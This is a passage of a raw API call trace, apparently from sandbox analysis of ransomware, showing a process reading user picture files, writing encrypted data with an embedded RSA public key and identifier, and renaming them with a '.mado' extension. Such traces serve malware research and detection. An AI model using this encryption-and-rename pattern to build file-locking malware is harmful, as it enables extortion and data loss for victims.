Size=0x8) returned 0x31b9e0 [0205.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79968 [0205.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79980 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79998 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799b0 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b799c8 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72c98 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799c8 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b72ec8 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0205.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b72b80 [0205.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaf0 | out: hHeap=0x2c0000) returned 1 [0205.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74b68 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72c98 | out: hHeap=0x2c0000) returned 1 [0205.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321958 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75a70 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75b78 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72ec8 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b799b0 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79998 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79980 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75c80 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb20 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b66b28 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75d88 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3720 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.932] WriteFile (in: hFile=0x63c, lpBuffer=0x3b81690*, nNumberOfBytesToWrite=0x124a5, lpNumberOfBytesWritten=0x39cfb14, lpOverlapped=0x0 | out: lpBuffer=0x3b81690*, lpNumberOfBytesWritten=0x39cfb14*=0x124a5, lpOverlapped=0x0) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b81690 | out: hHeap=0x2c0000) returned 1 [0205.932] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x124aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.932] WriteFile (in: hFile=0x63c, lpBuffer=0x3b75968*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b75968*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b75968 | out: hHeap=0x2c0000) returned 1 [0205.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x3b74b68 [0205.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b74b68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 41 [0205.933] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x3b74f98 [0205.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0205.933] WriteFile (in: hFile=0x63c, lpBuffer=0x3b74f98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b74f98*, lpNumberOfBytesWritten=0x39cfb50*=0x28, lpOverlapped=0x0) returned 1 [0205.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74f98 | out: hHeap=0x2c0000) returned 1 [0205.933] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.933] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.933] CloseHandle (hObject=0x63c) returned 1 [0205.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292de0 [0205.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8d0) returned 0x3b74b68 [0205.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3292de0 | out: hHeap=0x2c0000) returned 1 [0205.935] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\b5GbIKj2hxwk2k2X5s49.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\b5gbikj2hxwk2k2x5s49.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\b5GbIKj2hxwk2k2X5s49.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\b5gbikj2hxwk2k2x5s49.jpg.mado")) returned 1 [0205.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.935] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.936] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3073c90, ftCreationTime.dwHighDateTime=0x1d5e5a8, ftLastAccessTime.dwLowDateTime=0xc0ac4db0, ftLastAccessTime.dwHighDateTime=0x1d5e75d, ftLastWriteTime.dwLowDateTime=0xc0ac4db0, ftLastWriteTime.dwHighDateTime=0x1d5e75d, nFileSizeHigh=0x0, nFileSizeLow=0x538d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s6TOCeaG8kF.gif", cAlternateFileName="S6TOCE~1.GIF")) returned 1 [0205.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bcd0 [0205.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xee) returned 0x32b69d8 [0205.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bcd0 | out: hHeap=0x2c0000) returned 1 [0205.937] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\s6TOCeaG8kF.gif") returned=".gif" [0205.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\5DSZWpKJg8HwZKscy\\s6TOCeaG8kF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\5dszwpkjg8hwzkscy\\s6toceag8kf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.937] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=21389) returned 1 [0205.937] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.939] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x5367, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.939] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.941] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.941] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x538d, lpOverlapped=0x0) returned 1 [0205.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.942] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.942] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.942] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.943] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.943] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.943] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.943] GetLastError () returned 0x0 [0205.943] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.943] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.943] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.943] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.943] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5390) returned 0x3b81690 [0205.943] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66b28 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb20 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66b70 [0205.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaf0 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79968 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79980 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b6eb80 [0205.944] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79980 | out: hHeap=0x2c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feb08 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79968 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79980 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b72db0 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b72ec8 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72db0 | out: hHeap=0x2c0000) returned 1 [0205.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79968 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79980 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feb08 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.945] GetCurrentThreadId () returned 0x600 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x32feed8 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75d88 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.945] GetCurrentThreadId () returned 0x600 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32c64e8 [0205.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.945] RtlAllocateHeap 